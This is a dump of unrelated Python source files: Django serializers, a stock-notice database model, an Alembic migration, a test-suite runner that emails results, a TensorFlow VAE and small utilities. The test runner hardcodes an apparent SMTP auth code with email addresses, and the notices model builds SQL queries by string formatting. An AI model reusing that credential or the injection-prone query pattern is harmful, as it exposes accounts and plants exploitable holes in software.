IdentityMiniSerializer\nfrom users.models import Identity, Profile, StrengthStates, WorkExperience\n\n\nclass OrganizationSerializer(BaseSerializer):\n class Meta:\n model = Organization\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n validated_data.pop('admins')\n if 'owner' not in validated_data or not request.user.is_superuser:\n validated_data['owner'] = request.user\n organization = Organization.objects.create(**validated_data)\n organization.save()\n return organization\n\n def update(self, instance, validated_data):\n request = self.context.get('request')\n if 'owner' not in validated_data or not request.user.is_superuser:\n instance.owner = request.user\n else:\n instance.owner = validated_data.get('owner', None)\n\n # set validated data to organization instance\n for key in validated_data:\n if key != 'owner':\n setattr(instance, key, validated_data.get(key))\n instance.save()\n return instance\n\n\nclass MetaDataSerializer(BaseSerializer):\n class Meta:\n model = MetaData\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n if validated_data['meta_type'] == 'address':\n identity_meta_data = MetaData.objects.filter(meta_identity=validated_data['meta_identity'],\n meta_type=validated_data['meta_type'])\n if identity_meta_data.count() >= 3:\n error = {'message': \"organization have more than 3 \" + validated_data['meta_type'] + ' !'}\n raise serializers.ValidationError(error)\n elif len(validated_data['meta_value']) > 100:\n error = {'message': \"organization have more than 100 character !\"}\n raise serializers.ValidationError(error)\n elif validated_data['meta_type'] == 'address':\n identity_meta_data = MetaData.objects.filter(meta_identity=validated_data['meta_identity'],\n meta_type=validated_data['meta_type'])\n if identity_meta_data.count() >= 4:\n error = {'message': \"organization have more than 4 \" + validated_data['meta_type'] + ' !'}\n raise serializers.ValidationError(error)\n elif len(validated_data['meta_value']) > 20:\n error = {'message': \"organization have more than 20 character !\"}\n raise serializers.ValidationError(error)\n meta_data = MetaData.objects.create(**validated_data)\n meta_data.save()\n return meta_data\n\n\nclass MetaDataField(serializers.Field):\n\n def to_representation(self, obj):\n ret = []\n meta_data = MetaData.objects.filter(meta_organization_id=obj.id)\n if meta_data.count() != 0:\n for meta_item in meta_data:\n meta_object = {\n 'id': meta_item.id,\n 'meta_type': meta_item.meta_type,\n 'meta_title': meta_item.meta_title,\n 'meta_value': meta_item.meta_value\n }\n ret.append(meta_object)\n return ret\n\n def to_internal_value(self, data):\n ret = []\n return ret\n\n\nclass OrganizationListViewSerializer(BaseSerializer):\n owner = UserMiniSerializer()\n meta_data = MetaDataField(source='*', read_only=True)\n\n class Meta:\n model = Organization\n fields = ['id', 'owner', 'admins', 'username', 'email', 'nike_name', 'official_name', 'national_code',\n 'meta_data']\n\n\nclass OrganizationGetObjectSerializer(BaseSerializer):\n class Meta:\n model = Organization\n depth = 1\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass StaffCountSerializer(BaseSerializer):\n class Meta:\n model = StaffCount\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True},\n 'staff_count_organization': {'required': False}\n }\n\n\nclass OrganizationPictureSerializer(BaseSerializer):\n class Meta:\n model = OrganizationPicture\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass StaffListViewSerializer(BaseSerializer):\n staff_user = UserMiniSerializer()\n\n class Meta:\n model = Staff\n fields = ['id', 'staff_user', 'position', 'staff_organization']\n\n\nclass StaffSerializer(BaseSerializer):\n class Meta:\n model = Staff\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass FollowSerializer(BaseSerializer):\n class Meta:\n model = Follow\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True},\n 'follow_follower': {'required': False}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n # if (request.user.is_superuser and 'follow_follower' not in validated_data) or not request.user.is_superuser:\n if 'follow_follower' not in validated_data:\n identity = Identity.objects.get(identity_user=request.user)\n validated_data['follow_follower'] = identity\n follow = Follow.objects.create(**validated_data)\n follow.save()\n # self.check_follow_profile_strength(validated_data['follow_follower'])\n return follow\n\n def check_follow_profile_strength(self, identity):\n user = User.objects.get(pk=identity.identity_user_id)\n follows = Follow.objects.filter(follow_follower=identity)\n try:\n user_strength = StrengthStates.objects.get(strength_user=user)\n except StrengthStates.DoesNotExist:\n user_strength = StrengthStates.objects.create(strength_user=user)\n if user_strength.follow_obtained is False and follows.count() == 3:\n profile = Profile.objects.get(profile_user=user)\n profile.profile_strength += 5\n profile.save()\n user_strength.follow_obtained = True\n user_strength.save()\n\n\nclass FollowListSerializer(BaseSerializer):\n class Meta:\n model = Follow\n exclude = ['child_name']\n depth = 1\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass AbilitySerializer(BaseSerializer):\n class Meta:\n model = Ability\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n\nclass ConfirmationSerializer(BaseSerializer):\n class Meta:\n model = Confirmation\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n if 'confirmation_corroborant' not in validated_data or not request.user.is_superuser:\n identity = Identity.objects.get(identity_user=request.user)\n validated_data['confirmation_corroborant'] = identity\n if 'confirmation_confirmed' in validated_data:\n validated_data.pop('confirmation_confirmed', None)\n confirmation = Confirmation.objects.create(**validated_data)\n confirmation.save()\n return confirmation\n\n def update(self, instance, validated_data):\n if 'confirm_flag' in validated_data:\n experience = WorkExperience.objects.get(pk=instance.confirmation_parent_id)\n if validated_data.get('confirm_flag') is True:\n experience.status = \"CONFIRMED\"\n else:\n experience.status = \"WITHOUT_CONFIRM\"\n experience.save()\n if validated_data.get('confirm_flag') is True:\n organization = Organization.objects.filter(id=experience.work_experience_organization_id)[0]\n organization.staff_count = WorkExperience.objects.filter(work_experience_organization_id=organization.id, status=\"CONFIRMED\").count()\n organization.save()\n for key in validated_data:\n setattr(instance, key, validated_data.get(key))\n instance.save()\n return instance\n\n\nclass ConfirmationListViewSerializer(BaseSerializer):\n confirmation_corroborant = IdentityMiniSerializer()\n confirmation_confirmed = IdentityMiniSerializer()\n\n class Meta:\n model = Confirmation\n exclude = ['updated_time', 'child_name']\n\n\nclass CustomerSerializer(BaseSerializer):\n class Meta:\n model = Customer\n exclude = ['child_name']\n extra_kwargs = {\n 'updated_time': {'read_only': True}\n }\n\n def create(self, validated_data):\n request = self.context.get('request')\n if 'related_customer' not in validated_data or not request.user.is_superuser:\n identity = Identity.objects.get(identity_user=request.user)\n validated_data['related_customer'] = identity\n customer = Customer.objects.create(**validated_data)\n customer.save()\n return customer\n\n\nclass CustomerListSerializer(BaseSerializer):\n class Meta:\n model = Customer\n exclude = ['child_name']\n depth = 1","sub_path":"organizations/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":9894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146574080","text":"#!/bin/python\n# coding:utf8\nfrom connect import Connect\nimport time\n\n\nclass NoticesModel(Connect):\n \"\"\"连接数据库\"\"\"\n table = 'mv_stock_notices'\n instance = None\n\n def __init__(self):\n Connect.__init__(self)\n\n # 单例模式\n @classmethod\n def getInstance(cls):\n if not cls.instance:\n cls.instance = NoticesModel()\n return cls.instance\n\n #是否存在\n def isExist(self, sid, code):\n sql = \"select count(*) from mv_stock_notices where sid='%s' and secu_code = '%s'\" % (sid, code)\n self.cur.execute(sql)\n res = self.cur.fetchone()\n if res[0] > 0:\n return False\n else:\n return True\n # 新增数据\n def insert(self, param):\n timeData = int(time.time())\n\n sql = \"insert into mv_stock_notices(sid,secu_code,title,url,date,create_time,update_time) values('%s','%s','%s','%s','%s',%d,%d)\" % (\n param['sid'], param['secu_code'], param['title'], param['url'], param['date'], timeData, timeData);\n try:\n self.cur.execute(sql)\n self.con.commit()\n except Exception as e:\n self.con.rollback()\n\n\n","sub_path":"stock/model/notices.py","file_name":"notices.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"264886146","text":"\"\"\"refactor to more flexible object relations\n\nRevision ID: 774bc60b4a6\nRevises: 10eb9ecd9886\nCreate Date: 2016-04-11 18:17:02.372814\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nfrom sqlalchemy_utils import ChoiceType\n\nfrom alchemist.models.company_company import TypeOfRelation as cxc_TOR\nfrom alchemist.models.user_company import TypeOfRelation\n\nrevision = '774bc60b4a6'\ndown_revision = '10eb9ecd9886'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('company_x_company',\n sa.Column('left_id', sa.Integer(), nullable=False),\n sa.Column('right_id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.Unicode(), nullable=True),\n sa.Column('relation', ChoiceType(cxc_TOR, impl=sa.Integer()), nullable=True),\n sa.ForeignKeyConstraint(['left_id'], ['company.id'], ),\n sa.ForeignKeyConstraint(['right_id'], ['company.id'], ),\n sa.PrimaryKeyConstraint('left_id', 'right_id', 'relation')\n )\n\n migrate_wishlist = \"insert into company_x_company (left_id, right_id, relation) \" \\\n \"(select company_id, wishlist_company_id, %d from wishlist_x_company)\" \\\n % cxc_TOR.wishlistcustomer\n migrate_notable = \"insert into company_x_company (left_id, right_id, relation) \" \\\n \"(select company_id, notable_company_id, %d from notablecustomers_x_company)\" \\\n % int(cxc_TOR.notablecustomer)\n op.execute(migrate_wishlist)\n op.execute(migrate_notable)\n op.drop_table('wishlist_x_company')\n op.drop_table('notablecustomers_x_company')\n\n op.create_index(op.f('ix_company_x_company_comment'), 'company_x_company', ['comment'], unique=False)\n op.create_index(op.f('ix_company_x_company_left_id'), 'company_x_company', ['left_id'], unique=False)\n op.create_index(op.f('ix_company_x_company_relation'), 'company_x_company', ['relation'], unique=False)\n op.create_index(op.f('ix_company_x_company_right_id'), 'company_x_company', ['right_id'], unique=False)\n op.create_table('user_x_company',\n sa.Column('company_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('end_date', sa.Date(), nullable=True),\n sa.Column('start_date', sa.Date(), nullable=True),\n sa.Column('title', sa.Unicode(), nullable=True),\n sa.Column('relation', ChoiceType(TypeOfRelation, impl=sa.Integer()), nullable=True),\n sa.ForeignKeyConstraint(['company_id'], ['company.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('company_id', 'user_id', 'relation')\n )\n migrate_user_company = 'insert into user_x_company (company_id, user_id, relation) ' \\\n '(SELECT company_id, id, 0 from \"user\" where company_id is not null)'\n op.execute(migrate_user_company)\n op.create_index(op.f('ix_user_x_company_company_id'), 'user_x_company', ['company_id'], unique=False)\n op.create_index(op.f('ix_user_x_company_end_date'), 'user_x_company', ['end_date'], unique=False)\n op.create_index(op.f('ix_user_x_company_relation'), 'user_x_company', ['relation'], unique=False)\n op.create_index(op.f('ix_user_x_company_start_date'), 'user_x_company', ['start_date'], unique=False)\n op.create_index(op.f('ix_user_x_company_title'), 'user_x_company', ['title'], unique=False)\n op.create_index(op.f('ix_user_x_company_user_id'), 'user_x_company', ['user_id'], unique=False)\n op.create_table('user_x_user',\n sa.Column('left_id', sa.Integer(), nullable=False),\n sa.Column('right_id', sa.Integer(), nullable=False),\n sa.Column('relation', sa.Unicode(), nullable=True),\n sa.ForeignKeyConstraint(['left_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['right_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('left_id', 'right_id')\n )\n op.create_index(op.f('ix_user_x_user_left_id'), 'user_x_user', ['left_id'], unique=False)\n op.create_index(op.f('ix_user_x_user_relation'), 'user_x_user', ['relation'], unique=False)\n op.create_index(op.f('ix_user_x_user_right_id'), 'user_x_user', ['right_id'], unique=False)\n\n op.drop_index('ix_company_privatefields_values', table_name='company')\n op.drop_column('company', 'privatefields_values')\n op.drop_index('ix_user_company_id', table_name='user')\n op.drop_index('ix_user_weekly_focus', table_name='user')\n op.drop_constraint(u'user_company_id_fkey', 'user', type_='foreignkey')\n op.drop_column('user', 'weekly_focus')\n op.drop_column('user', 'company_id')\n op.drop_column('user', 'name')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('name', sa.VARCHAR(length=200), autoincrement=False, nullable=True))\n op.add_column('user', sa.Column('company_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.add_column('user', sa.Column('weekly_focus', sa.VARCHAR(length=100), autoincrement=False, nullable=True))\n op.create_foreign_key(u'user_company_id_fkey', 'user', 'company', ['company_id'], ['id'])\n op.create_index('ix_user_weekly_focus', 'user', ['weekly_focus'], unique=False)\n op.create_index('ix_user_company_id', 'user', ['company_id'], unique=False)\n\n op.drop_index(op.f('ix_connection_message'), table_name='connection')\n op.add_column('company',\n sa.Column('privatefields_values', sa.TEXT(), server_default=sa.text(u\"''::text\"), autoincrement=False,\n nullable=True))\n op.create_index('ix_company_privatefields_values', 'company', ['privatefields_values'], unique=False)\n op.create_index('company_name_unix', 'company', ['name'], unique=True)\n\n op.drop_index(op.f('ix_user_x_user_right_id'), table_name='user_x_user')\n op.drop_index(op.f('ix_user_x_user_relation'), table_name='user_x_user')\n op.drop_index(op.f('ix_user_x_user_left_id'), table_name='user_x_user')\n op.drop_table('user_x_user')\n op.drop_index(op.f('ix_user_x_company_user_id'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_title'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_start_date'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_relation'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_end_date'), table_name='user_x_company')\n op.drop_index(op.f('ix_user_x_company_company_id'), table_name='user_x_company')\n op.drop_table('user_x_company')\n op.drop_index(op.f('ix_company_x_company_right_id'), table_name='company_x_company')\n op.drop_index(op.f('ix_company_x_company_relation'), table_name='company_x_company')\n op.drop_index(op.f('ix_company_x_company_left_id'), table_name='company_x_company')\n op.drop_index(op.f('ix_company_x_company_comment'), table_name='company_x_company')\n op.drop_table('company_x_company')\n ### end Alembic commands ###\n","sub_path":"migrate-alembic/versions/774bc60b4a6_refactor_to_more_flexible_object_.py","file_name":"774bc60b4a6_refactor_to_more_flexible_object_.py","file_ext":"py","file_size_in_byte":7420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"190622702","text":"import json, os, sys\n\n'''\nExample of how to write JSON config files for a hyperparameter search.\nAfter you've written the files you can call them with something like\npython train.py --config_file=\n\nThe json files can be loaded to a python dict using\nwith open(path_to_config_file, 'r') as f:\n configs = json.load(f)\n'''\n\ndef main(output_dir):\n\n '''dataname = ['EDonnerFlanger']\n\n frcut = [2,3,4,6]\n for each in frcut:\n dataname.append('EDonnerFlangerfrcut' + str(each))\n\n MxErcut = [2,5,10,15]\n for each in MxErcut:\n dataname.append('EDonnerFlangerMxErcut' + str(each))\n\n AvErcut = [200,400,800, 1600, 2000]\n for each in AvErcut:\n dataname.append('EDonnerFlangerAvErcut' + str(each))'''\n dataname = []\n Singles = 16\n for each in range(16):\n dataname.append('EDonnerFlangerSingles' + str(each + 1))\n\n hids = [16]\n\n\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n i = 70\n\n for pedals in dataname:\n for hid in hids:\n configs = {'pedal': pedals,\n 'hidden_size': hid}\n filename = 'config{:01}.json'.format(i)\n with open(os.path.join(output_dir, filename), 'w') as f:\n json.dump(configs, f) # Write to dict to JSON\n i += 1\n\nif __name__ == '__main__':\n usage = 'usage: python hyperparameter_configs.py '\n try:\n output_dir = sys.argv[1]\n if sys.argv[1] == '--help' or sys.argv[1] == '-h':\n print(usage)\n sys.exit(0)\n except IndexError:\n print(usage)\n sys.exit(1)\n main(output_dir)","sub_path":"NNetz/hyper_configs.py","file_name":"hyper_configs.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"329087820","text":"#!/usr/bin/env python\n\nfrom insilico.runner import run_workflow\nfrom insilico.validate_input import validate_input\nimport argparse\n\nmsg = \"python run_filter.py -i input.yml\"\nparser = argparse.ArgumentParser(description=msg)\n\nparser.add_argument('-i', required=True, help=\"Input file in YAML format\")\n\n\ndef main():\n args = parser.parse_args()\n inp = validate_input(args.i)\n run_workflow(inp)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/filter/run_filters.py","file_name":"run_filters.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"480794400","text":"#encoding:utf-8\nimport unittest\nimport sys\nPROJECT_PATH = r\"D:\\python\\Test_App\\osc_test\"\nsys.path.append(PROJECT_PATH)\nfrom login.LoginCheck import LoginCheck\nfrom login.LoginPermissionCheck import LoginPremissionCheck\nfrom versioncheck.VersionCheck import VersionCheck\nfrom myreadcheck.MyReadsCheck import MyReadsCheck\nfrom share_crossapp.ShareMoment import ShareMoment\nfrom share_crossapp.ShareMsg import ShareMsg\nfrom share_crossapp.ShareTOQQ import ShareToQQ\nfrom webview.WebView import WebView\nfrom utils.MailUtils import MailUtils\nfrom HTMLTestRunner import HTMLTestRunner\nimport time\nimport os\n\n\ndef getSuite():\n login_test_cases = unittest.TestLoader().loadTestsFromTestCase(LoginCheck)\n loginPremission_test_cases = unittest.TestLoader().loadTestsFromTestCase(LoginPremissionCheck)\n versionCheck_test_cases = unittest.TestLoader().loadTestsFromTestCase(VersionCheck)\n myreads_test_cases = unittest.TestLoader().loadTestsFromTestCase(MyReadsCheck)\n sharemsg_test_cases = unittest.TestLoader().loadTestsFromTestCase(ShareMsg)\n sharemoment_test_cases = unittest.TestLoader().loadTestsFromTestCase(ShareMoment)\n sharetoQQ_test_cases = unittest.TestLoader().loadTestsFromTestCase(ShareToQQ)\n webview_test_cases = unittest.TestLoader().loadTestsFromTestCase(WebView)\n suite = unittest.TestSuite()\n #suite.addTests([login_test_cases,])\n suite.addTests([loginPremission_test_cases,login_test_cases,\\\n versionCheck_test_cases,myreads_test_cases, \\\n sharemsg_test_cases,sharemoment_test_cases,\n sharetoQQ_test_cases,webview_test_cases,])\n return suite\n\ndef send_report(filePath):\n with open(filePath, \"rb\") as file:\n content = file.read()\n mailinfo = {\n \"sender\": \"xiaobai1q@163.com\",\n \"receiver\": 'xiaobairena1q@163.com,598520439@qq.com',\n \"mailserver\": \"smtp.163.com\",\n \"subject\": \"登陆测试用例执行结果\",\n \"subtype\": \"html\",\n \"charset\": \"utf-8\",\n \"content\": content,\n \"auth_code\": \"gexiaoyan123456\",\n \"filename\": \"osc_app_test_result.html\"\n }\n utils = MailUtils(mailinfo)\n utils.send_mail()\n\n\nif __name__ == '__main__':\n suite = getSuite()\n filePath = PROJECT_PATH+os.sep+\"testReport\"+os.sep+time.strftime(\"%Y-%m-%d %H_%M_%S\", time.localtime()) + \"_osc_app_result.html\"\n with open(filePath, \"wb\") as file:\n runner = HTMLTestRunner(stream=file, verbosity=2, title=\"开源中国app测试报告\", description=\"登陆测试用例执行结果:\")\n runner.run(suite)\n send_report(filePath)\n\n\n","sub_path":"testcases/TestCasesSuite.py","file_name":"TestCasesSuite.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392500931","text":"import datetime as dt\n\n\ndef solution(n, t, m, timetable):\n buses = [[dt.time(hour=9).replace(hour=9+(t*i//60), minute=(t*i) % 60), m, []] for i in range(n)]\n timetable.sort()\n crews = [dt.time.fromisoformat(tmtb) if tmtb != '24:00' else dt.time(hour=0, minute=0) for tmtb in timetable]\n for idx, crew in enumerate(crews):\n for bus in buses:\n if bus[1] > 0 and bus[0] >= crew:\n bus[1] -= 1\n bus[2].append(idx)\n break\n \n # 마지막 버스에 자리가 있다 / 없다\n if buses[-1][1] == 0:\n last_ride_crew = buses[-1][2][-1]\n tmp = crews[last_ride_crew].isoformat()\n \n tmp_h, tmp_m, _ = map(int, tmp.split(':'))\n if tmp_m == 0:\n tmp_h, tmp_m = tmp_h-1, 59\n else:\n tmp_m -= 1\n answer = dt.time(hour=tmp_h, minute=tmp_m).isoformat()[:-3]\n else:\n answer = buses[-1][0].isoformat()[:-3]\n \n return answer\n \n\nn = 1\nt = 1\nm = 5\ntimetable = [\"08:00\", \"08:01\", \"08:02\", \"08:03\"]\nprint(solution(n, t, m, timetable))\n","sub_path":"Programmers/연습문제/Level 3/[1차] 셔틀버스.py","file_name":"[1차] 셔틀버스.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"558085112","text":"#分词方法:最大正向切分的第一种实现方式\n\nimport re\nimport time\n\n#加载词典\ndef load_word_dict(path):\n max_word_length = 0\n word_dict = {} #用set也是可以的。用list会很慢\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word = line.split()[0]\n word_dict[word] = 0\n max_word_length = max(max_word_length, len(word))\n return word_dict, max_word_length\n\n#先确定最大词长度\n#从长向短查找是否有匹配的词\n#找到后移动窗口\ndef cut_method1(string, word_dict, max_len):\n words = []\n while string != '':\n lens = min(max_len, len(string))\n word = string[:lens]\n while word not in word_dict:\n if len(word) == 1:\n break\n word = word[:len(word) - 1]\n words.append(word)\n string = string[len(word):]\n return words\n\n#cut_method是切割函数\n#output_path是输出路径\ndef main(cut_method, input_path, output_path):\n word_dict, max_word_length = load_word_dict(\"dict.txt\")\n writer = open(output_path, \"w\", encoding=\"utf8\")\n start_time = time.time()\n with open(input_path, encoding=\"utf8\") as f:\n for line in f:\n words = cut_method(line.strip(), word_dict, max_word_length)\n writer.write(\" / \".join(words) + \"\\n\")\n writer.close()\n print(\"耗时:\", time.time() - start_time)\n return\n\n\nstring = \"测试字符串\"\nword_dict, max_len = load_word_dict(\"dict.txt\")\n# print(cut_method1(string, word_dict, max_len))\n\nmain(cut_method1, \"corpus.txt\", \"cut_method1_output.txt\")\n","sub_path":"125-吕军-北京/week03/forward_segmentation_method1.py","file_name":"forward_segmentation_method1.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"426417982","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.python import array_ops, keras\n\nfrom odin.bay.random_variable import RandomVariable as RV\nfrom odin.bay.vi.autoencoder.beta_vae import BetaVAE\n\n\nclass MultitaskVAE(BetaVAE):\n r\"\"\" Multi-tasks VAE for semi-supervised learning\n\n Example:\n\n ```\n from odin.fuel import MNIST\n from odin.bay.vi.autoencoder import MultitaskVAE\n\n # load the dataset, include 50% of the labels for semi-supervised objective\n ds = MNIST()\n train = ds.create_dataset(partition='train', inc_labels=0.5)\n\n # create and train the model\n vae = MultitaskVAE(encoder='mnist',\n outputs=RV((28, 28, 1),\n 'bern',\n projection=False,\n name=\"Image\"),\n labels=RV(10, 'onehot', projection=True, name=\"Digit\"))\n vae.fit(train, epochs=-1, max_iter=8000, compile_graph=True, sample_shape=1)\n ```\n \"\"\"\n\n def __init__(self,\n outputs=RV(64, 'gaussian', projection=True, name=\"Input\"),\n labels=RV(10, 'onehot', projection=True, name=\"Label\"),\n alpha=10.,\n beta=1.,\n **kwargs):\n labels = tf.nest.flatten(labels)\n outputs = tf.nest.flatten(outputs)\n outputs += labels\n super().__init__(beta=beta, outputs=outputs, **kwargs)\n self.labels = labels\n self.alpha = alpha\n\n @property\n def alpha(self):\n return self._alpha\n\n @alpha.setter\n def alpha(self, a):\n self._alpha = tf.convert_to_tensor(a, dtype=self.dtype, name='alpha')\n\n def encode(self, inputs, training=None, mask=None, sample_shape=(), **kwargs):\n n_outputs = len(self.output_layers)\n n_semi = len(self.labels)\n inputs = tf.nest.flatten(inputs)[:(n_outputs - n_semi)]\n if len(inputs) == 1:\n inputs = inputs[0]\n return super().encode(inputs,\n training=training,\n mask=mask,\n sample_shape=sample_shape,\n **kwargs)\n\n def _elbo(self, inputs, pX_Z, qZ_X, analytic, reverse, sample_shape, mask,\n training, **kwargs):\n n_semi = len(self.labels)\n # unsupervised ELBO\n llk, div = super()._elbo(inputs,\n pX_Z[:-n_semi],\n qZ_X,\n analytic=analytic,\n reverse=reverse,\n sample_shape=sample_shape,\n mask=mask,\n training=training,\n **kwargs)\n # supervised log-likelihood\n if len(inputs) > len(self.output_layers) - n_semi:\n Y = inputs[-n_semi:]\n pY_Z = pX_Z[-n_semi:]\n mask = tf.nest.flatten(mask)\n if len(mask) == 1:\n mask = mask * n_semi\n # iterate over each pair\n for layer, y, py, m in zip(self.output_layers[-n_semi:], Y, pY_Z, mask):\n name = layer.name\n lk_y = py.log_prob(y)\n if m is not None:\n m = tf.reshape(m, (-1,))\n # take into account the sample_shape by transpose the batch dim to\n # the first dimension\n # need to check the mask here, otherwise the loss can be NaN\n lk_y = tf.cond(\n tf.reduce_all(tf.logical_not(m)),\n lambda: 0.,\n lambda: tf.transpose(\n tf.boolean_mask(tf.transpose(lk_y), m, axis=0)),\n )\n # this is important, if loss=0 when using one-hot log_prob,\n # the gradient is NaN\n loss = tf.reduce_mean(self.alpha * lk_y)\n loss = tf.cond(\n tf.abs(loss) < 1e-8, lambda: tf.stop_gradient(loss), lambda: loss)\n llk[\"llk_%s\" % name] = loss\n # print(llk, div)\n return llk, div\n\n @property\n def is_semi_supervised(self):\n return True\n\n\nclass MultiheadVAE(MultitaskVAE):\n r\"\"\" A same multi-outputs design as `MultitaskVAE`, however, the\n semi-supervised heads are directly connected to the latent layers to\n exert influences. \"\"\"\n\n def __init__(self,\n outputs=RV(64, 'gaussian', projection=True, name=\"Input\"),\n labels=RV(10, 'onehot', projection=True, name=\"Label\"),\n alpha=10.,\n beta=1.,\n **kwargs):\n super().__init__(alpha=alpha,\n beta=beta,\n outputs=outputs,\n labels=[],\n **kwargs)\n # create and build the semi-supervised output layers\n self.labels = tf.nest.flatten(labels)\n z = keras.Input(shape=self.latent_shape[1:], batch_size=None)\n semi_layers = [\n l.create_posterior(self.latent_shape[1:]) for l in self.labels\n ]\n for layer in semi_layers:\n layer(z)\n # add to the main output layers\n self.output_layers += semi_layers\n\n @property\n def is_semi_supervised(self):\n return True\n\n def decode(self,\n latents,\n training=None,\n mask=None,\n sample_shape=(),\n **kwargs):\n n_semi = len(self.labels)\n semi_layers = self.output_layers[-n_semi:]\n self.output_layers = self.output_layers[:-n_semi]\n # unsupervised outputs\n pX = super().decode(latents, training, mask, sample_shape, **kwargs)\n # semi outputs\n pY = [layer(latents, training=training, mask=mask) for layer in semi_layers]\n for p in pY: # remember to store the keras mask in outputs\n p._keras_mask = mask\n # recover and return\n self.output_layers = self.output_layers + semi_layers\n return tf.nest.flatten(pX) + pY\n","sub_path":"odin/bay/vi/autoencoder/multitask_vae.py","file_name":"multitask_vae.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507894975","text":"import aiohttp.web\nimport asyncio\nimport functools\nimport aiohttp_session\nimport aiohttp_session.cookie_storage\n\n\nclass Mead():\n\n def __init__(self, router=None, session_encrypt_key=None):\n self.app = aiohttp.web.Application()\n self.router = router\n self.session_encrypt_key = session_encrypt_key\n\n\n async def init(self, loop, address, port):\n handler = self.app.make_handler()\n for method, path, obj in self.router:\n self.app.router.add_route(method, path, obj)\n srv = await loop.create_server(handler, address, port)\n aiohttp_session.setup(self.app, aiohttp_session.cookie_storage.EncryptedCookieStorage(self.session_encrypt_key))\n return srv, handler\n\n\n def serve(self, port=8080, address=\"127.0.0.1\"):\n print(\"Starting on http://{}:{}\".format(address, port))\n loop = asyncio.get_event_loop()\n self.app._loop = loop\n\n srv, handler = loop.run_until_complete(self.init(loop, address, port))\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n loop.run_until_complete(handler.finish_connections())\n","sub_path":"mead/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"449310845","text":"__url__ = \"https://www.hackerrank.com/challenges/detect-html-tags-attributes-and-attribute-values/problem\"\n\nfrom html.parser import HTMLParser\n\nclass MyHTMLParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n print(tag)\n for attr in attrs:\n print(\"-> {} > {}\".format(attr[0], attr[1]))\n\n def handle_startendtag(self, tag, attrs):\n print(tag)\n for attr in attrs:\n print(\"-> {} > {}\".format(attr[0], attr[1]))\n\n\nn = int(input())\ntext = \"\"\nfor _ in range(n):\n text += input()\n\nparser = MyHTMLParser()\nparser.feed(text)\n","sub_path":"Python Practice/Detect_HTML_Tags.py","file_name":"Detect_HTML_Tags.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467679380","text":"\"\"\"#,bga\npython3 k3/misc/basic_graphics_test.py\n#,bgb\"\"\"\n\nfrom k3 import *\n\nclear_screen()\ncr('r')\ncg('g')\ncb('b')\nclp('testing','`rgb','various','`ybu','colors','`m')\n\nraw_enter()\n\na = z55(rndn(64,64,3))\nimg_path = opjD('temp.jpg')\nimsave(img_path,a)\nb = imread(img_path)\n\nmi(b)\nmci(b,scale=4)\n\nraw_enter();CA()\n\nos.system('rm 